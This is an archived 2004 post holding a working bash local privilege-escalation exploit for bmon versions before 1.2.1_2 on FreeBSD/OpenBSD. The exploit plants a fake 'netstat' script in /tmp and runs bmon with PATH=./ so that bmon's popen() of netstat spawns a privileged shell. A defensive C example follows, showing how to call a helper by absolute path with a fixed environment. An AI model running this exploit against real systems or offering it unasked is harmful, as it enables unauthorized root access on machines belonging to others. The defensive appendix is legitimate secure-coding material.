bmon < 1.2.1_2 local exploit
Source: www.bk.ru  Author: Idan  Published: 2004-10-19



#!/usr/local/bin/bash

# Written by Idan Nahoum. idanna@bk.ru
# local exploit for FreeBSD/OpenBSD with bmon < 1.2.1_2 installed.
# when bmon is executed with the -n parameter it popen()s netstat
# but fails to provide an absolute path.
# some BSDs are configured with ACLs that don't allow setuid files to
# run except those that are explicitly allowed, so creating a file called
# netstat that chmod's +s bash wouldn't work; bash needs to be run directly by
# bmon, which uses ncurses, so to get a usable shell we need to redirect
# stdout to stderr (stdout is closed), and restore the stty settings.
# http://www.vuxml.org/freebsd/938f357c-16dd-11d9-bc4a-000c41e2cdad.html

declare -r SPATH="${PATH}"
declare -r STTY_EXEC=$(which stty)
declare -r STTY_SETTINGS=$(${STTY_EXEC} -g)
declare -r QSHELL="/usr/local/bin/bash"
declare BMON_EXEC="/usr/local/sbin/bmon"

echo "$0 [default: ${BMON_EXEC}]"

[ "$#" -gt "0" ] && BMON_EXEC="${1}"

[ -x "${BMON_EXEC}" ] ||
{
    echo "${BMON_EXEC} not found"
    exit
}

cd /tmp

# apparently bmon closes stdout, so we run a shell with stdout redirected
# to stderr.

cat > ./netstat <<EOF
${STTY_EXEC} ${STTY_SETTINGS}
PATH=${SPATH} /bin/sh 1>&2
EOF

/bin/chmod 755 ./netstat
echo "trying to exploit"
PATH=./ "${BMON_EXEC}" -n
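
The defensive counterpart to the flaw described in the script's comments, as an added example that is not taken from bmon or from the original post: a privileged program runs its helper by absolute path with a fixed environment instead of calling popen() with a bare command name. The names run_helper and SAFE_ENV and the PATH value are assumptions made for this illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Fixed environment for the child (assumed value): the caller's PATH is never inherited. */
static char *const SAFE_ENV[] = { "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };

/* Run a helper by absolute path, without a shell, and copy its stdout into
 * out (always NUL-terminated). Returns the number of bytes captured, or -1
 * if the path is not absolute, the helper cannot be run, or it exits non-zero. */
long run_helper(const char *path, char *const argv[], char *out, size_t outlen)
{
    int fds[2], status;
    pid_t pid;
    size_t used = 0;
    ssize_t n;

    if (path == NULL || path[0] != '/' || out == NULL || outlen == 0)
        return -1;                       /* refuse bare names such as "netstat" */
    memset(out, 0, outlen);
    if (pipe(fds) != 0)
        return -1;
    pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {                      /* child */
        close(fds[0]);
        if (fds[1] != STDOUT_FILENO) {   /* differs unless the caller had closed stdout */
            if (dup2(fds[1], STDOUT_FILENO) < 0)
                _exit(127);
            close(fds[1]);
        }
        execve(path, argv, SAFE_ENV);    /* execve() never searches PATH */
        _exit(127);
    }
    close(fds[1]);
    while (used < outlen - 1 &&
           (n = read(fds[0], out + used, outlen - 1 - used)) > 0)
        used += (size_t)n;
    close(fds[0]);
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return -1;
    return (long)used;
}
```

A set-user-ID program whose helper does not need elevated rights should also drop its privileges in the child before the execve() call.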



 